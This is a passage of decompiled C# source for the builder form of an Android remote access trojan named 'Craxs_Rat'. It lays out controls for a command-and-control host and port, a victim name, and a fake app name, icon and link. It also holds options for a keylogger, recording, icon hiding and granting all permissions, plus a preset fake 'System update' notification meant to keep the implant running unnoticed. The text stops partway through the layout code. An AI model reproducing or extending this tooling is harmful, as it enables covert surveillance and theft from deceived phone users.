namespace Craxs_Rat
{
	// Token: 0x020000A3 RID: 163
	[global::Microsoft.VisualBasic.CompilerServices.DesignerGenerated]
	public partial class Build : global::System.Windows.Forms.Form
	{
		// Token: 0x060008C4 RID: 2244 RVA: 0x0005F97C File Offset: 0x0005DB7C
		protected override void Dispose(bool disposing)
		{
			try
			{
				if (disposing && this.components != null)
				{
					((global::System.IDisposable)this.components).Dispose();
				}
			}
			finally
			{
				base.Dispose(disposing);
			}
		}

		// Token: 0x060008C5 RID: 2245 RVA: 0x0005F9C0 File Offset: 0x0005DBC0
		private void InitializeComponent()
		{
			this.components = new global::System.ComponentModel.Container();
			global::System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle = new global::System.Windows.Forms.DataGridViewCellStyle();
			global::System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle2 = new global::System.Windows.Forms.DataGridViewCellStyle();
			global::System.ComponentModel.ComponentResourceManager componentResourceManager = new global::System.ComponentModel.ComponentResourceManager(typeof(global::Craxs_Rat.Build));
			this.DGV0 = new global::System.Windows.Forms.DataGridView();
			this.Column2 = new global::System.Windows.Forms.DataGridViewTextBoxColumn();
			this.po = new global::System.Windows.Forms.NumericUpDown();
			this.Panel1 = new global::System.Windows.Forms.Panel();
			this.DrakeUIAvatar2 = new global::DrakeUI.Framework.DrakeUIAvatar();
			this.DrakeUIAvatar1 = new global::DrakeUI.Framework.DrakeUIAvatar();
			this.Label1 = new global::System.Windows.Forms.Label();
			this.MainText = new global::System.Windows.Forms.Label();
			this.TextIP = new global::System.Windows.Forms.TextBox();
			this.box = new global::System.Windows.Forms.Panel();
			this.TABCTRL = new global::DrakeUI.Framework.DrakeUITabControl();
			this.TabPage4 = new global::System.Windows.Forms.TabPage();
			this.TabPage9 = new global::System.Windows.Forms.TabPage();
			this.Panel3 = new global::System.Windows.Forms.Panel();
			this.CheckDoze = new global::DrakeUI.Framework.DrakeUICheckBox();
			this.sizelabel = new global::System.Windows.Forms.Label();
			this.CheckFakeSize = new global::DrakeUI.Framework.DrakeUICheckBox();
			this.Label30 = new global::System.Windows.Forms.Label();
			this.Panel4 = new global::System.Windows.Forms.Panel();
			this.Label28 = new global::System.Windows.Forms.Label();
			this.Nottitle = new global::System.Windows.Forms.TextBox();
			this.Label25 = new global::System.Windows.Forms.Label();
			this.Label24 = new global::System.Windows.Forms.Label();
			this.Notmsg = new global::System.Windows.Forms.TextBox();
			this.Label12 = new global::System.Windows.Forms.Label();
			this.TextSize = new global::System.Windows.Forms.TextBox();
			this.keeplivelabel = new global::System.Windows.Forms.Label();
			this.fakepanel = new global::System.Windows.Forms.Panel();
			this.Button1 = new global::System.Windows.Forms.Button();
			this.Label27 = new global::System.Windows.Forms.Label();
			this.fakeiconpic = new global::System.Windows.Forms.PictureBox();
			this.Textfakelink = new global::System.Windows.Forms.TextBox();
			this.Textfakename = new global::System.Windows.Forms.TextBox();
			this.Label23 = new global::System.Windows.Forms.Label();
			this.Label22 = new global::System.Windows.Forms.Label();
			this.Label21 = new global::System.Windows.Forms.Label();
			this.combotype = new global::MetroSet_UI.Controls.MetroSetComboBox();
			this.Label20 = new global::System.Windows.Forms.Label();
			this.Label7 = new global::System.Windows.Forms.Label();
			this.Label5 = new global::System.Windows.Forms.Label();
			this.TabPage10 = new global::System.Windows.Forms.TabPage();
			this.Panel2 = new global::System.Windows.Forms.Panel();
			this.CheckHide = new global::DrakeUI.Framework.DrakeUICheckBox();
			this.CheckIconPatch = new global::DrakeUI.Framework.DrakeUICheckBox();
			this.randomverbtn = new global::System.Windows.Forms.Button();
			this.randomidbtn = new global::System.Windows.Forms.Button();
			this.Label11 = new global::System.Windows.Forms.Label();
			this.Label4 = new global::System.Windows.Forms.Label();
			this.Label9 = new global::System.Windows.Forms.Label();
			this.Label3 = new global::System.Windows.Forms.Label();
			this.Label2 = new global::System.Windows.Forms.Label();
			this.TextNameVictim = new global::System.Windows.Forms.TextBox();
			this.TextNamePatch = new global::System.Windows.Forms.TextBox();
			this.TextVersion = new global::System.Windows.Forms.TextBox();
			this.TextPackage = new global::System.Windows.Forms.TextBox();
			this.PictureBox1 = new global::System.Windows.Forms.PictureBox();
			this.TabPage11 = new global::System.Windows.Forms.TabPage();
			this.Panel5 = new global::System.Windows.Forms.Panel();
			this.CheckBIND = new global::DrakeUI.Framework.DrakeUICheckBox();
			this.CheckDraw = new global::DrakeUI.Framework.DrakeUICheckBox();
			this.checkemo = new global::DrakeUI.Framework.DrakeUICheckBox();
			this.CheckRecord = new global::DrakeUI.Framework.DrakeUICheckBox();
			this.Checksuper = new global::DrakeUI.Framework.DrakeUICheckBox();
			this.checkkeyloger = new global::DrakeUI.Framework.DrakeUICheckBox();
			this.CheckQuick = new global::DrakeUI.Framework.DrakeUICheckBox();
			this.Label35 = new global::System.Windows.Forms.Label();
			this.Label36 = new global::System.Windows.Forms.Label();
			this.explaintoolstext = new global::System.Windows.Forms.TextBox();
			this.Label33 = new global::System.Windows.Forms.Label();
			this.Label34 = new global::System.Windows.Forms.Label();
			this.Label17 = new global::System.Windows.Forms.Label();
			this.Label26 = new global::System.Windows.Forms.Label();
			this.trgtbkg = new global::System.Windows.Forms.TextBox();
			this.Label10 = new global::System.Windows.Forms.Label();
			this.AutoRec = new global::System.Windows.Forms.Label();
			this.Label19 = new global::System.Windows.Forms.Label();
			this.checkver = new global::MetroSet_UI.Controls.MetroSetComboBox();
			this.Label16 = new global::System.Windows.Forms.Label();
			this.Label18 = new global::System.Windows.Forms.Label();
			this.Label14 = new global::System.Windows.Forms.Label();
			this.Label15 = new global::System.Windows.Forms.Label();
			this.Label6 = new global::System.Windows.Forms.Label();
			this.Label13 = new global::System.Windows.Forms.Label();
			this.TabPage12 = new global::System.Windows.Forms.TabPage();
			this.Panel6 = new global::System.Windows.Forms.Panel();
			this.Label37 = new global::System.Windows.Forms.Label();
			this.dscriptext = new global::System.Windows.Forms.TextBox();
			this.Label29 = new global::System.Windows.Forms.Label();
			this.Label31 = new global::System.Windows.Forms.Label();
			this.Label32 = new global::System.Windows.Forms.Label();
			this.Button3 = new global::System.Windows.Forms.Button();
			this.logbtntext = new global::System.Windows.Forms.TextBox();
			this.logbodytext = new global::System.Windows.Forms.TextBox();
			this.logtitletext = new global::System.Windows.Forms.TextBox();
			this.PictureBox2 = new global::System.Windows.Forms.PictureBox();
			this.TabPage13 = new global::System.Windows.Forms.TabPage();
			this.Panel7 = new global::System.Windows.Forms.Panel();
			this.CheckAllPrims = new global::DrakeUI.Framework.DrakeUICheckBox();
			this.Label8 = new global::System.Windows.Forms.Label();
			this.comboproms = new global::DrakeUI.Framework.DrakeUIComboBox();
			this.removeactiv = new global::System.Windows.Forms.Button();
			this.Primslist = new global::DrakeUI.Framework.DrakeUIListBox();
			this.addactiv = new global::System.Windows.Forms.Button();
			this.TabPage14 = new global::System.Windows.Forms.TabPage();
			this.TextBox1 = new global::System.Windows.Forms.TextBox();
			this.errorlogs = new global::System.Windows.Forms.TextBox();
			this.Panel8 = new global::System.Windows.Forms.Panel();
			this.Label40 = new global::System.Windows.Forms.Label();
			this.Label39 = new global::System.Windows.Forms.Label();
			this.SelectedApk = new global::System.Windows.Forms.Button();
			this.StyleManager1 = new global::MetroSet_UI.Components.StyleManager();
			this.TiMAT = new global::System.Windows.Forms.Timer(this.components);
			this.FolderPath = new global::System.Windows.Forms.FolderBrowserDialog();
			this.FilePathApk = new global::System.Windows.Forms.OpenFileDialog();
			this.TOpacity = new global::System.Windows.Forms.Timer(this.components);
			this.startTime = new global::System.Windows.Forms.Timer(this.components);
			this.ToolTip1 = new global::System.Windows.Forms.ToolTip(this.components);
			((global::System.ComponentModel.ISupportInitialize)this.DGV0).BeginInit();
			((global::System.ComponentModel.ISupportInitialize)this.po).BeginInit();
			this.Panel1.SuspendLayout();
			this.box.SuspendLayout();
			this.TABCTRL.SuspendLayout();
			this.TabPage4.SuspendLayout();
			this.TabPage9.SuspendLayout();
			this.Panel3.SuspendLayout();
			this.Panel4.SuspendLayout();
			this.fakepanel.SuspendLayout();
			((global::System.ComponentModel.ISupportInitialize)this.fakeiconpic).BeginInit();
			this.TabPage10.SuspendLayout();
			this.Panel2.SuspendLayout();
			((global::System.ComponentModel.ISupportInitialize)this.PictureBox1).BeginInit();
			this.TabPage11.SuspendLayout();
			this.Panel5.SuspendLayout();
			this.TabPage12.SuspendLayout();
			this.Panel6.SuspendLayout();
			((global::System.ComponentModel.ISupportInitialize)this.PictureBox2).BeginInit();
			this.TabPage13.SuspendLayout();
			this.Panel7.SuspendLayout();
			this.TabPage14.SuspendLayout();
			this.Panel8.SuspendLayout();
			base.SuspendLayout();
			this.DGV0.AllowUserToAddRows = false;
			this.DGV0.AllowUserToDeleteRows = false;
			this.DGV0.AllowUserToResizeColumns = false;
			this.DGV0.AllowUserToResizeRows = false;
			this.DGV0.AutoSizeColumnsMode = global::System.Windows.Forms.DataGridViewAutoSizeColumnsMode.Fill;
			this.DGV0.AutoSizeRowsMode = global::System.Windows.Forms.DataGridViewAutoSizeRowsMode.AllCells;
			this.DGV0.BackgroundColor = global::System.Drawing.Color.FromArgb(10, 10, 10);
			this.DGV0.BorderStyle = global::System.Windows.Forms.BorderStyle.Fixed3D;
			this.DGV0.CellBorderStyle = global::System.Windows.Forms.DataGridViewCellBorderStyle.None;
			this.DGV0.ColumnHeadersBorderStyle = global::System.Windows.Forms.DataGridViewHeaderBorderStyle.None;
			dataGridViewCellStyle.Alignment = global::System.Windows.Forms.DataGridViewContentAlignment.MiddleLeft;
			dataGridViewCellStyle.BackColor = global::System.Drawing.Color.Black;
			dataGridViewCellStyle.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			dataGridViewCellStyle.ForeColor = global::System.Drawing.Color.White;
			dataGridViewCellStyle.SelectionBackColor = global::System.Drawing.SystemColors.Highlight;
			dataGridViewCellStyle.SelectionForeColor = global::System.Drawing.SystemColors.HighlightText;
			dataGridViewCellStyle.WrapMode = global::System.Windows.Forms.DataGridViewTriState.True;
			this.DGV0.ColumnHeadersDefaultCellStyle = dataGridViewCellStyle;
			this.DGV0.ColumnHeadersHeightSizeMode = global::System.Windows.Forms.DataGridViewColumnHeadersHeightSizeMode.AutoSize;
			this.DGV0.Columns.AddRange(new global::System.Windows.Forms.DataGridViewColumn[]
			{
				this.Column2
			});
			dataGridViewCellStyle2.Alignment = global::System.Windows.Forms.DataGridViewContentAlignment.MiddleLeft;
			dataGridViewCellStyle2.BackColor = global::System.Drawing.Color.Black;
			dataGridViewCellStyle2.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			dataGridViewCellStyle2.ForeColor = global::System.Drawing.Color.FromArgb(240, 240, 240);
			dataGridViewCellStyle2.SelectionBackColor = global::System.Drawing.Color.FromArgb(240, 240, 240);
			dataGridViewCellStyle2.SelectionForeColor = global::System.Drawing.Color.Black;
			dataGridViewCellStyle2.WrapMode = global::System.Windows.Forms.DataGridViewTriState.False;
			this.DGV0.DefaultCellStyle = dataGridViewCellStyle2;
			this.DGV0.Dock = global::System.Windows.Forms.DockStyle.Bottom;
			this.DGV0.EditMode = global::System.Windows.Forms.DataGridViewEditMode.EditProgrammatically;
			this.DGV0.EnableHeadersVisualStyles = false;
			this.DGV0.GridColor = global::System.Drawing.Color.FromArgb(42, 42, 42);
			this.DGV0.Location = new global::System.Drawing.Point(0, 334);
			this.DGV0.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.DGV0.Name = "DGV0";
			this.DGV0.RowHeadersBorderStyle = global::System.Windows.Forms.DataGridViewHeaderBorderStyle.Single;
			this.DGV0.RowHeadersVisible = false;
			this.DGV0.SelectionMode = global::System.Windows.Forms.DataGridViewSelectionMode.FullRowSelect;
			this.DGV0.Size = new global::System.Drawing.Size(1075, 343);
			this.DGV0.TabIndex = 5;
			this.Column2.HeaderText = "DNS/ip:port";
			this.Column2.Name = "Column2";
			this.po.BackColor = global::System.Drawing.Color.FromArgb(20, 20, 20);
			this.po.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
			this.po.Font = new global::System.Drawing.Font("Palatino Linotype", 9f, global::System.Drawing.FontStyle.Bold);
			this.po.ForeColor = global::System.Drawing.Color.FromArgb(95, 95, 250);
			this.po.Location = new global::System.Drawing.Point(440, 265);
			this.po.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			global::System.Windows.Forms.NumericUpDown po = this.po;
			int[] array = new int[4];
			array[0] = 65535;
			po.Maximum = new decimal(array);
			this.po.Name = "po";
			this.po.Size = new global::System.Drawing.Size(332, 28);
			this.po.TabIndex = 9;
			this.po.TextAlign = global::System.Windows.Forms.HorizontalAlignment.Center;
			global::System.Windows.Forms.NumericUpDown po2 = this.po;
			int[] array2 = new int[4];
			array2[0] = 7744;
			po2.Value = new decimal(array2);
			this.Panel1.BackColor = global::System.Drawing.Color.Black;
			this.Panel1.Controls.Add(this.DrakeUIAvatar2);
			this.Panel1.Controls.Add(this.DrakeUIAvatar1);
			this.Panel1.Controls.Add(this.Label1);
			this.Panel1.Controls.Add(this.MainText);
			this.Panel1.Controls.Add(this.DGV0);
			this.Panel1.Controls.Add(this.po);
			this.Panel1.Controls.Add(this.TextIP);
			this.Panel1.Dock = global::System.Windows.Forms.DockStyle.Fill;
			this.Panel1.Location = new global::System.Drawing.Point(0, 0);
			this.Panel1.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.Panel1.Name = "Panel1";
			this.Panel1.Size = new global::System.Drawing.Size(1075, 677);
			this.Panel1.TabIndex = 10;
			this.DrakeUIAvatar2.FillColor = global::System.Drawing.Color.Black;
			this.DrakeUIAvatar2.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.DrakeUIAvatar2.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.DrakeUIAvatar2.Location = new global::System.Drawing.Point(195, 226);
			this.DrakeUIAvatar2.Margin = new global::System.Windows.Forms.Padding(4);
			this.DrakeUIAvatar2.Name = "DrakeUIAvatar2";
			this.DrakeUIAvatar2.Size = new global::System.Drawing.Size(80, 87);
			this.DrakeUIAvatar2.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.DrakeUIAvatar2.Symbol = 61544;
			this.DrakeUIAvatar2.TabIndex = 15;
			this.DrakeUIAvatar2.Text = "DrakeUIAvatar2";
			this.DrakeUIAvatar2.TextAlign = global::System.Drawing.ContentAlignment.BottomCenter;
			this.DrakeUIAvatar1.FillColor = global::System.Drawing.Color.Black;
			this.DrakeUIAvatar1.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.DrakeUIAvatar1.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.DrakeUIAvatar1.Location = new global::System.Drawing.Point(195, 68);
			this.DrakeUIAvatar1.Margin = new global::System.Windows.Forms.Padding(4);
			this.DrakeUIAvatar1.Name = "DrakeUIAvatar1";
			this.DrakeUIAvatar1.Size = new global::System.Drawing.Size(80, 87);
			this.DrakeUIAvatar1.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.DrakeUIAvatar1.Symbol = 61543;
			this.DrakeUIAvatar1.TabIndex = 14;
			this.DrakeUIAvatar1.Text = "DrakeUIAvatar1";
			this.DrakeUIAvatar1.TextAlign = global::System.Drawing.ContentAlignment.BottomCenter;
			this.Label1.AutoSize = true;
			this.Label1.BackColor = global::System.Drawing.Color.Transparent;
			this.Label1.Font = new global::System.Drawing.Font("Palatino Linotype", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label1.ForeColor = global::System.Drawing.Color.White;
			this.Label1.Location = new global::System.Drawing.Point(494, 226);
			this.Label1.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label1.Name = "Label1";
			this.Label1.Size = new global::System.Drawing.Size(197, 34);
			this.Label1.TabIndex = 13;
			this.Label1.Text = "Connection Port";
			this.MainText.AutoSize = true;
			this.MainText.BackColor = global::System.Drawing.Color.Transparent;
			this.MainText.Font = new global::System.Drawing.Font("Palatino Linotype", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.MainText.ForeColor = global::System.Drawing.Color.White;
			this.MainText.Location = new global::System.Drawing.Point(535, 44);
			this.MainText.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.MainText.Name = "MainText";
			this.MainText.Size = new global::System.Drawing.Size(110, 34);
			this.MainText.TabIndex = 12;
			this.MainText.Text = "Host / ip";
			this.TextIP.BackColor = global::System.Drawing.Color.FromArgb(20, 20, 20);
			this.TextIP.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
			this.TextIP.Font = new global::System.Drawing.Font("Palatino Linotype", 9f, global::System.Drawing.FontStyle.Bold);
			this.TextIP.ForeColor = global::System.Drawing.Color.FromArgb(95, 95, 250);
			this.TextIP.Location = new global::System.Drawing.Point(441, 83);
			this.TextIP.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.TextIP.Name = "TextIP";
			this.TextIP.Size = new global::System.Drawing.Size(331, 28);
			this.TextIP.TabIndex = 0;
			this.TextIP.Text = "127.0.0.1";
			this.TextIP.TextAlign = global::System.Windows.Forms.HorizontalAlignment.Center;
			this.box.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
			this.box.Controls.Add(this.TABCTRL);
			this.box.Dock = global::System.Windows.Forms.DockStyle.Fill;
			this.box.Location = new global::System.Drawing.Point(0, 0);
			this.box.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.box.Name = "box";
			this.box.Size = new global::System.Drawing.Size(1077, 734);
			this.box.TabIndex = 11;
			this.TABCTRL.Controls.Add(this.TabPage4);
			this.TABCTRL.Controls.Add(this.TabPage9);
			this.TABCTRL.Controls.Add(this.TabPage10);
			this.TABCTRL.Controls.Add(this.TabPage11);
			this.TABCTRL.Controls.Add(this.TabPage12);
			this.TABCTRL.Controls.Add(this.TabPage13);
			this.TABCTRL.Controls.Add(this.TabPage14);
			this.TABCTRL.Dock = global::System.Windows.Forms.DockStyle.Fill;
			this.TABCTRL.DrawMode = global::System.Windows.Forms.TabDrawMode.OwnerDrawFixed;
			this.TABCTRL.FillColor = global::System.Drawing.Color.White;
			this.TABCTRL.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.TABCTRL.ItemSize = new global::System.Drawing.Size(150, 55);
			this.TABCTRL.Location = new global::System.Drawing.Point(0, 0);
			this.TABCTRL.MenuStyle = global::DrakeUI.Framework.UIMenuStyle.Custom;
			this.TABCTRL.Name = "TABCTRL";
			this.TABCTRL.SelectedIndex = 0;
			this.TABCTRL.Size = new global::System.Drawing.Size(1075, 732);
			this.TABCTRL.SizeMode = global::System.Windows.Forms.TabSizeMode.Fixed;
			this.TABCTRL.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.TABCTRL.TabBackColor = global::System.Drawing.Color.Black;
			this.TABCTRL.TabIndex = 16;
			this.TABCTRL.TabSelectedColor = global::System.Drawing.Color.Black;
			this.TABCTRL.TabSelectedForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.TABCTRL.TabSelectedHighColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.TABCTRL.TabUnSelectedForeColor = global::System.Drawing.Color.FromArgb(240, 240, 240);
			this.TabPage4.BackColor = global::System.Drawing.Color.White;
			this.TabPage4.Controls.Add(this.Panel1);
			this.TabPage4.Location = new global::System.Drawing.Point(0, 55);
			this.TabPage4.Name = "TabPage4";
			this.TabPage4.Size = new global::System.Drawing.Size(1075, 677);
			this.TabPage4.TabIndex = 0;
			this.TabPage4.Text = "Connection";
			this.TabPage9.BackColor = global::System.Drawing.Color.White;
			this.TabPage9.Controls.Add(this.Panel3);
			this.TabPage9.Location = new global::System.Drawing.Point(0, 55);
			this.TabPage9.Name = "TabPage9";
			this.TabPage9.Size = new global::System.Drawing.Size(1075, 677);
			this.TabPage9.TabIndex = 1;
			this.TabPage9.Text = "Options";
			this.Panel3.BackColor = global::System.Drawing.Color.Black;
			this.Panel3.Controls.Add(this.CheckDoze);
			this.Panel3.Controls.Add(this.sizelabel);
			this.Panel3.Controls.Add(this.CheckFakeSize);
			this.Panel3.Controls.Add(this.Label30);
			this.Panel3.Controls.Add(this.Panel4);
			this.Panel3.Controls.Add(this.TextSize);
			this.Panel3.Controls.Add(this.keeplivelabel);
			this.Panel3.Controls.Add(this.fakepanel);
			this.Panel3.Controls.Add(this.Label21);
			this.Panel3.Controls.Add(this.combotype);
			this.Panel3.Controls.Add(this.Label20);
			this.Panel3.Controls.Add(this.Label7);
			this.Panel3.Controls.Add(this.Label5);
			this.Panel3.Dock = global::System.Windows.Forms.DockStyle.Fill;
			this.Panel3.Location = new global::System.Drawing.Point(0, 0);
			this.Panel3.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.Panel3.Name = "Panel3";
			this.Panel3.Size = new global::System.Drawing.Size(1075, 677);
			this.Panel3.TabIndex = 12;
			this.CheckDoze.CheckBoxColor = global::System.Drawing.Color.FromArgb(30, 136, 229);
			this.CheckDoze.Cursor = global::System.Windows.Forms.Cursors.Hand;
			this.CheckDoze.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.CheckDoze.Location = new global::System.Drawing.Point(44, 509);
			this.CheckDoze.Name = "CheckDoze";
			this.CheckDoze.Padding = new global::System.Windows.Forms.Padding(22, 0, 0, 0);
			this.CheckDoze.Size = new global::System.Drawing.Size(44, 29);
			this.CheckDoze.TabIndex = 71;
			this.sizelabel.AutoSize = true;
			this.sizelabel.BackColor = global::System.Drawing.Color.Transparent;
			this.sizelabel.Font = new global::System.Drawing.Font("Roboto", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.sizelabel.ForeColor = global::System.Drawing.Color.White;
			this.sizelabel.Location = new global::System.Drawing.Point(55, 331);
			this.sizelabel.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.sizelabel.Name = "sizelabel";
			this.sizelabel.Size = new global::System.Drawing.Size(127, 30);
			this.sizelabel.TabIndex = 48;
			this.sizelabel.Text = "• App Size";
			this.CheckFakeSize.CheckBoxColor = global::System.Drawing.Color.FromArgb(30, 136, 229);
			this.CheckFakeSize.Checked = true;
			this.CheckFakeSize.Cursor = global::System.Windows.Forms.Cursors.Hand;
			this.CheckFakeSize.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.CheckFakeSize.ForeColor = global::System.Drawing.Color.White;
			this.CheckFakeSize.Location = new global::System.Drawing.Point(93, 386);
			this.CheckFakeSize.Margin = new global::System.Windows.Forms.Padding(4);
			this.CheckFakeSize.Name = "CheckFakeSize";
			this.CheckFakeSize.Padding = new global::System.Windows.Forms.Padding(22, 0, 0, 0);
			this.CheckFakeSize.Size = new global::System.Drawing.Size(155, 36);
			this.CheckFakeSize.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.CheckFakeSize.TabIndex = 47;
			this.CheckFakeSize.Text = "Fake Apk Size";
			this.CheckFakeSize.Visible = false;
			this.Label30.AutoSize = true;
			this.Label30.BackColor = global::System.Drawing.Color.Transparent;
			this.Label30.Font = new global::System.Drawing.Font("Palatino Linotype", 10f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label30.ForeColor = global::System.Drawing.Color.White;
			this.Label30.Location = new global::System.Drawing.Point(283, 337);
			this.Label30.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label30.Name = "Label30";
			this.Label30.Size = new global::System.Drawing.Size(38, 23);
			this.Label30.TabIndex = 46;
			this.Label30.Text = "MB";
			this.Panel4.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
			this.Panel4.Controls.Add(this.Label28);
			this.Panel4.Controls.Add(this.Nottitle);
			this.Panel4.Controls.Add(this.Label25);
			this.Panel4.Controls.Add(this.Label24);
			this.Panel4.Controls.Add(this.Notmsg);
			this.Panel4.Controls.Add(this.Label12);
			this.Panel4.Location = new global::System.Drawing.Point(413, 397);
			this.Panel4.Margin = new global::System.Windows.Forms.Padding(4);
			this.Panel4.Name = "Panel4";
			this.Panel4.Size = new global::System.Drawing.Size(518, 240);
			this.Panel4.TabIndex = 47;
			this.Label28.AutoSize = true;
			this.Label28.BackColor = global::System.Drawing.Color.Transparent;
			this.Label28.Font = new global::System.Drawing.Font("Roboto", 20f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label28.ForeColor = global::System.Drawing.Color.White;
			this.Label28.Location = new global::System.Drawing.Point(93, 37);
			this.Label28.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label28.Name = "Label28";
			this.Label28.Size = new global::System.Drawing.Size(321, 41);
			this.Label28.TabIndex = 48;
			this.Label28.Text = "Custom Notification";
			this.Nottitle.BackColor = global::System.Drawing.Color.FromArgb(34, 34, 34);
			this.Nottitle.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
			this.Nottitle.ForeColor = global::System.Drawing.Color.White;
			this.Nottitle.Location = new global::System.Drawing.Point(184, 111);
			this.Nottitle.Margin = new global::System.Windows.Forms.Padding(4);
			this.Nottitle.Name = "Nottitle";
			this.Nottitle.Size = new global::System.Drawing.Size(327, 30);
			this.Nottitle.TabIndex = 41;
			this.Nottitle.Text = "System update";
			this.Nottitle.TextAlign = global::System.Windows.Forms.HorizontalAlignment.Center;
			this.Label25.AutoSize = true;
			this.Label25.BackColor = global::System.Drawing.Color.Transparent;
			this.Label25.Font = new global::System.Drawing.Font("Palatino Linotype", 10f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label25.ForeColor = global::System.Drawing.Color.White;
			this.Label25.Location = new global::System.Drawing.Point(4, 175);
			this.Label25.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label25.Name = "Label25";
			this.Label25.Size = new global::System.Drawing.Size(172, 23);
			this.Label25.TabIndex = 44;
			this.Label25.Text = "Notification Message";
			this.Label24.AutoSize = true;
			this.Label24.BackColor = global::System.Drawing.Color.Transparent;
			this.Label24.Font = new global::System.Drawing.Font("Palatino Linotype", 10f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label24.ForeColor = global::System.Drawing.Color.White;
			this.Label24.Location = new global::System.Drawing.Point(4, 114);
			this.Label24.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label24.Name = "Label24";
			this.Label24.Size = new global::System.Drawing.Size(140, 23);
			this.Label24.TabIndex = 43;
			this.Label24.Text = "Notification Title";
			this.Notmsg.BackColor = global::System.Drawing.Color.FromArgb(34, 34, 34);
			this.Notmsg.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
			this.Notmsg.ForeColor = global::System.Drawing.Color.White;
			this.Notmsg.Location = new global::System.Drawing.Point(184, 171);
			this.Notmsg.Margin = new global::System.Windows.Forms.Padding(4);
			this.Notmsg.Name = "Notmsg";
			this.Notmsg.Size = new global::System.Drawing.Size(327, 30);
			this.Notmsg.TabIndex = 42;
			this.Notmsg.Text = "New system software is available, Tap to learn more.";
			this.Notmsg.TextAlign = global::System.Windows.Forms.HorizontalAlignment.Center;
			this.Label12.AutoSize = true;
			this.Label12.BackColor = global::System.Drawing.Color.Transparent;
			this.Label12.Font = new global::System.Drawing.Font("Palatino Linotype", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label12.ForeColor = global::System.Drawing.Color.FromArgb(65, 177, 225);
			this.Label12.Location = new global::System.Drawing.Point(422, 44);
			this.Label12.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label12.Name = "Label12";
			this.Label12.Size = new global::System.Drawing.Size(26, 34);
			this.Label12.TabIndex = 35;
			this.Label12.Text = "?";
			this.ToolTip1.SetToolTip(this.Label12, "Keep APK Running in Backgorund, \r\nby showing sticky Notification");
			this.TextSize.BackColor = global::System.Drawing.Color.FromArgb(34, 34, 34);
			this.TextSize.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
			this.TextSize.ForeColor = global::System.Drawing.Color.White;
			this.TextSize.Location = new global::System.Drawing.Point(190, 329);
			this.TextSize.Margin = new global::System.Windows.Forms.Padding(4);
			this.TextSize.Name = "TextSize";
			this.TextSize.Size = new global::System.Drawing.Size(82, 30);
			this.TextSize.TabIndex = 45;
			this.TextSize.Text = "1";
			this.TextSize.TextAlign = global::System.Windows.Forms.HorizontalAlignment.Center;
			this.keeplivelabel.AutoSize = true;
			this.keeplivelabel.BackColor = global::System.Drawing.Color.Transparent;
			this.keeplivelabel.Font = new global::System.Drawing.Font("Roboto", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.keeplivelabel.ForeColor = global::System.Drawing.Color.White;
			this.keeplivelabel.Location = new global::System.Drawing.Point(95, 508);
			this.keeplivelabel.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.keeplivelabel.Name = "keeplivelabel";
			this.keeplivelabel.Size = new global::System.Drawing.Size(135, 30);
			this.keeplivelabel.TabIndex = 28;
			this.keeplivelabel.Text = "Keep Alive";
			this.fakepanel.BackColor = global::System.Drawing.Color.Black;
			this.fakepanel.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
			this.fakepanel.Controls.Add(this.Button1);
			this.fakepanel.Controls.Add(this.Label27);
			this.fakepanel.Controls.Add(this.fakeiconpic);
